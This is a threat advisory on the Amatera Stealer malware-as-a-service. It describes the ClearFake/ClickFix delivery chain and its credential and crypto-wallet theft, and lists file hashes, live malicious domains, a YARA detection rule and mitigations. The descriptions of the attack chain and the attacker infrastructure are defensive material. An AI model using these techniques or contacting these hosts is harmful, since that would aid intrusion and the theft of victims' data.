Amatera Stealer Launches Sophisticated Multi-Stage Attacks via ClearFake
Threat Type: Infostealer malware (Malware-as-a-Service)
Exploited Vulnerabilities: CVE-2024-21412 (SmartScreen Bypass), user execution via ClearFake+ClickFix, EtherHiding
Malware Used: Amatera Stealer (formerly ACR Stealer)
Threat Score: 🔴 High (8.0/10) – Evasive, persistent, dynamically updated MaaS platform with novel C2 and shellcode tactics.
Last Threat Observation: June 19, 2025
Overview
Amatera Stealer represents an evolved and dangerous continuation of the ACR Stealer lineage, now fully rebranded and operated as a sophisticated Malware-as-a-Service by the Russian-speaking threat actor SheldIO. Abandoning previously detectable Dead Drop Resolver infrastructure, Amatera now employs stealthy NTSockets and advanced delivery vectors like ClearFake site injects, EtherHiding smart contract delivery, and the deceptive ClickFix method.
This advisory incorporates major threat intelligence updates as of mid-June 2025, confirming that Amatera has entered a new operational phase characterized by low-level evasion, kernel-bypassing C2 channels, PowerShell-obfuscated multi-stage chains, and widespread abuse of decentralized infrastructure. Its growing range of anti-analysis techniques and persistent update cadence further elevate its risk profile.
Key Details
Delivery Method: ClearFake website injects (with EtherHiding smart contracts), ClickFix (user execution via fake CAPTCHA + Run box + PowerShell)
Target: Finance, enterprise, crypto wallet users, remote workers
Functions:
- Credential theft (browsers, password managers)
- Crypto wallet exfiltration
- Sensitive document capture (.docx, .xlsx, .pdf)
- Shellcode injection (Early Bird, Context Hijack)
- Secondary payload delivery (.exe, .ps1, .dll)
Obfuscation: Base64/XOR, PowerShell + msbuild chain, AMSI/ETW bypass, WoW64 Syscalls, CDN abuse, dynamic API resolution
Attack Vectors
Amatera is spread primarily through compromised websites hosting the ClearFake JavaScript framework. The EtherHiding technique stores malicious JavaScript on Binance Smart Chain smart contracts, dynamically pulled into infected sites.
Victims are tricked with fake update/CAPTCHA prompts (ClickFix), which lead them to paste malicious PowerShell into the Run dialog. The payload chain uses Invoke-RestMethod to fetch .csproj files, executed by msbuild.exe. These spawn advanced shellcode loaders that hijack suspended legitimate processes and launch Amatera within memory.
Known Indicators of Compromise (IoCs) SHA256:
- SHA1 Hashes
- da9825ec812af43e4177c25b0fc98917a1e5fd99
SHA256 Hashes
- 055a883f18ffcc413973fa45383e72e998aae87909af5f9507b6384bfec34a5b
- 120316ecaf06b76a564ce42e11f7074c52df6d79b85d3526c5b4e9f362d2f1c2
- 2960d5f8a3d9b0a21d6b744092fe3089517ecf2e49169683f754bfe9800e3991
- 35eb93548a0c037d392f870c05e0e9fb1aeff3a5a505e1d4a087f7465ed1f6af
- 7d91a585583f4aa1a3ab3cb808d7bc351d6140b3ae1deeef9d51c6414c11baea
- ad9ffd624e27070092ff18a10e33fa9e2784b2c75ac9ac4540fa81cf5bd84e55
Domains
- amaprox[.]icu
- badnesspandemic[.]shop
- overplanteasiest[.]top
Hostnames
- b1[.]talismanoverblown[.]com
- cv[.]cbrw[.]ru
- tt[.]cbrw[.]ru
YARA Rule (Hashes)
import "hash"
rule Detect_Malicious_Hashes_And_Network_Indicators
{
meta:
description = "Detect known malicious file hashes and network indicators"
author = "Blair Little"
date = "2025-06-18"
version = "1.1"
condition:
hash.md5 == "1b4a67d5fc078f87ab5574c970c297f4" or
hash.sha1 == "da9825ec812af43e4177c25b0fc98917a1e5fd99" or
hash.sha256 == "055a883f18ffcc413973fa45383e72e998aae87909af5f9507b6384bfec34a5b" or
hash.sha256 == "120316ecaf06b76a564ce42e11f7074c52df6d79b85d3526c5b4e9f362d2f1c2" or
hash.sha256 == "2960d5f8a3d9b0a21d6b744092fe3089517ecf2e49169683f754bfe9800e3991" or
hash.sha256 == "35eb93548a0c037d392f870c05e0e9fb1aeff3a5a505e1d4a087f7465ed1f6af" or
hash.sha256 == "7d91a585583f4aa1a3ab3cb808d7bc351d6140b3ae1deeef9d51c6414c11baea" or
hash.sha256 == "ad9ffd624e27070092ff18a10e33fa9e2784b2c75ac9ac4540fa81cf5bd84e55"
}
Mitigation and Prevention
User Awareness:
- Train users to avoid cracked software
- Educate on ClickFix: never paste commands into Run box
- Warn about fake CAPTCHA/updates on legitimate-looking sites
Email Filtering:
- Block emails linking to compromised WordPress sites
- Filter links to *.xyz, *.icu, *.biz domains
Antivirus Protection:
- Use EDRs with behavior-based detection
- Monitor for msbuild activity, PowerShell with irm/IEX, direct memory injection
Two-Factor Authentication (2FA):
- Require MFA on cloud services and admin portals
Monitor Logs:
- Log msbuild.exe use and outbound connections to CDNs with hardcoded Host headers
- Audit unusual NTSocket-based traffic via \Device\Afd\Endpoint
Regular Updates:
- Apply patches for CVE-2024-21412
- Patch SmartScreen, MSC, Windows Scripting Host
Risk Assessment
Amatera Stealer poses an ongoing, high-level threat. The integration of decentralized smart contract delivery (EtherHiding), evasive C2 (NTSockets, CDN IP with spoofed Host headers), and user-assisted execution chains (ClickFix) exemplifies a mature threat landscape. Its persistence, capability scope, and obfuscation layers render traditional controls insufficient. Security teams must shift to memory forensics, behavior-based analytics, and aggressive endpoint telemetry.
Conclusion
Amatera Stealer’s trajectory shows a strong commitment to innovation by its operator SheldIO. As defenses adapt, so does the malware—evolving from Dead Drop Resolvers to direct syscalls and blockchain hosting. Only layered, adaptive defense postures can counter this increasingly sophisticated infostealer. Organizations are urged to adopt threat hunting strategies that identify early-stage PowerShell usage, monitor for signs of ClearFake campaigns, and maintain strong cyber hygiene across all endpoints.
Sources:
- Proofpoint – Amatera Stealer: Rebranded ACR Stealer With Improved Evasion, Sophistication
- IBM X-Force Exchange - Amatera Stealer: Rebranded ACR Stealer With Improved Evasion, Sophistication
- OTX AlienVault – Indicators Of Compromise